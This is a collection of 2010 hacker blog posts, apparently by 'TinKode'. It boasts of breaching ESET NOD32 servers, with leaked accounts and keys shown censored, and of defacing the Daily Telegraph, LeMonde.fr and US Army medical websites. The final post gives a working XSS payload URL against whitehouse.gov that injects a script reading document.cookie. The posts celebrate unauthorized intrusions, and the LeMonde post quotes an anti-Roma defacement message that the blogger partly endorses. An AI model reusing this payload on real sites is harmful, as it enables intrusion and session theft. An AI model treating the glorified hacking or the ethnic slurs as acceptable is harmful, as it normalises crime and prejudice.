  • nod32@tw :  censored
  • soman    :  censored
The accounts are in plain-text… great!
Now some keys from “ censored key censored “:
  • J102- censored :J112- censored
  • J102- censored :J112- censored
  • J102- censored :J112- censored
  • J102- censored :J112- censored
  • J102- censored :J112- censored
  • J102- censored :J112- censored
  • J102- censored :J112- censored
  • J102- censored :J112- censored
  • J102- censored :J112- censored
~Verry simple!
Other webservers of ESET NOD32 hacked: NOD32 Hong Kong & NOD32 Romania
~Thanks, TinKode

TinKode-Daily Telegraph websites hacked


Daily Telegraph websites hacked

Posted by isrtinkode on April 15, 2010
Telegraph site hacked by Romanians
The ‘Romanian National Security’ logo on the Telegraph’s hacked site
Part of the Daily Telegraph‘s website has been hacked, apparently by people in Romania who were aggrieved at its identification of “gypsies” and “Romanians”.
Its “Short Breaks” and Wine And Dine sections were both hacked, with the Short Breaks site still up at 12.55pm today, with a picture of a Romanian flag claiming to be for the “Romanian National Security”, some comments in Romanian and the remark in English at the bottom that “Guess what, gypsies aren’t romanians, morons.” It also links to a Russian site which plays an MP3 called The Lonely Shepherd.
Sunbelt Software, which first noticed the hack, said that it had alerted the Telegraph when it noticed the hack.
The method used to hack into the site is not known. Chris Boyd, a researcher at Sunbelt, said that a translation of the text from the page says that the hackers are “sick of seeing garbage like this … calling us Romanians ‘gypsies’.” It also attacks Britain for “broadcasting shitty TV programs like Top Gear”.
But Boyd said that the group is apparently unknown even among Romanian hackers – suggesting that it may be one person with a grievance against the Telegraph.
In March 2009 the Telegraph’s system was also hacked, exposing the email addresses of registered users on part of its site. That hack also seems to have been done by a Romanian hacker – suggesting that the site has become a target.
A later posting in May on the Hackersblog site suggested that there was a weakness on the Telegraph site that allowed it to be hacked repeatedly.

TinKode-US Army Medical Department Regiment


US Army Medical Department Regiment Hacked

Posted by isrtinkode on April 15, 2010

About U.S. Army Medical Department:

The U.S. Army Medical Department was formed on 27 July, 1775, when the Continental Congress authorized a Medical Service for an army of 20,000 men. It created the Hospital Department and named Dr. Benjamin Church of Boston as Director General and Chief Physician. On 14 April, 1818 the Congress passed an Act which reorganized the staff departments of the Army. The Act provided for a Medical Department to be headed by a Surgeon General. Dr. Joseph Lovell, appointed Surgeon General of the United States Army in April 1818, was the first to hold this position in the new organization. The passage of this law marks the beginning of the modern Medical Department of the United States Army.
….
This web site been designed to provide you with useful information about the U.S. Army Medical Department (AMEDD) Regiment. Through this web site, you will learn the history of the AMEDD Regiment, the symbolism behind our heraldic items, how to wear the Regimental Distinctive insignia, and various programs available to you and your unit.
URL: http://ameddregiment.amedd.army.mil

TinKode-(metc.mil)Hacked


(metc.mil) Medical Education & Training Campus Hacked

Posted by isrtinkode on April 15, 2010
ScreenShot:
Link: www.metc.mil
Full Disclosure!
About:
The Joint Medical Education and Training Campus at Fort Sam Houston in Texas is to be the military’s primary site for joint and service specific health care education and training. The Center will effectively consolidate five separate major learning institutions at a single location, and will provide medical personnel from the Army, Air Force, and Navy with both a standard medical core curriculum as well as courses specific to each service.
The center will be the largest military medical education and training institution in the world and its creation is expected to be the largest consolidation of service training in the history of the United States Department of Defense, with more than 9,000 active duty students from all three services being trained at any given time. An estimated 32,000 personnel will be trained at the facility annually.
Health care training activities will be consolidated from a variety of locations across the United States, to include Walter Reed Army Medical Center and Bethesda Naval Medical Center, Naval Medical Center San Diego, Naval Station Great Lakes, Sheppard Air Force Base, and Naval Medical Center Portsmouth.

TinKode-LeMonde.fr


LeMonde.fr @ (Hacked) Romanian National Security

Posted by isrtinkode on April 19, 2010
Saved on zone-h:
http://zone-h.org/mirror/id/10560479
The subdomain defaced:
http://planete-plus-intelligente.lemonde.fr
Screenshot:

Mesajul este destul de clar (The message):
Aceasta nu este o miscare de rezistenta, un protest, sau o revolta!
Este strigatul întregului popor român ce face apel la fratii nostri care au uitat ca si în venele noastre circula un sânge roman.
Sângele ce-a fost jertfit si varsat pe câmpurile de lupta pentru a fi scrisa istoria neamului nostru cere acum DREPTATE.
Eroii patriei noastre nu vor muri niciodata! Vrem sa nu se uite CINE l-a varsat pentru ca România sa existe astazi pe harta,
sa le amintim copiilor si nepotilor nostri, sa îi respectam cu onoarea cuvenita. Ne-a ajuns atâta batjocura.
Tiganii nu sunt Români! Nu ei ne-au scris istoria!
Când vorbiti despre compatriotii nostri nu mai folositi expresiile “Tigani Români”.
Noi v-am respectat Franta, voi ne veti respecta ROMÂNIA!
R.N.S. VEGHEAZA pentru ca aceste lucruri sa fie înfaptuite..

———————————————————
Cu putine zile in urma tot aceasta echipa necunoscuta pana acum (RNSRomanian National Security) a mai transmis tot prin aceasi “metoda” un mesage destul de dur celor de la The Daily Telegraph.
Personal, din cate observ acesti baieti au ceva cu toate tarile care au stricat imaginea Romaniei.
Nu incurajez asemenea lucruri, dar unii chiar o merita!
———————————————————-
Sursa: www.hackersblog.org
———————————————————-

TinKode-WhiteHouse.gov XSS Vulnerability


WhiteHouse.gov XSS Vulnerability

Posted by isrtinkode on April 25, 2010
WhiteHouse.gov XSS Vulnerability
POC:
https://app2.whitehouse.gov/*******?height=200&width=300&urlloc=”><script>alert(document.cookie)</script>
Screen:

Note: You can’t do much with that, but it’s a vulnerability anyway! :)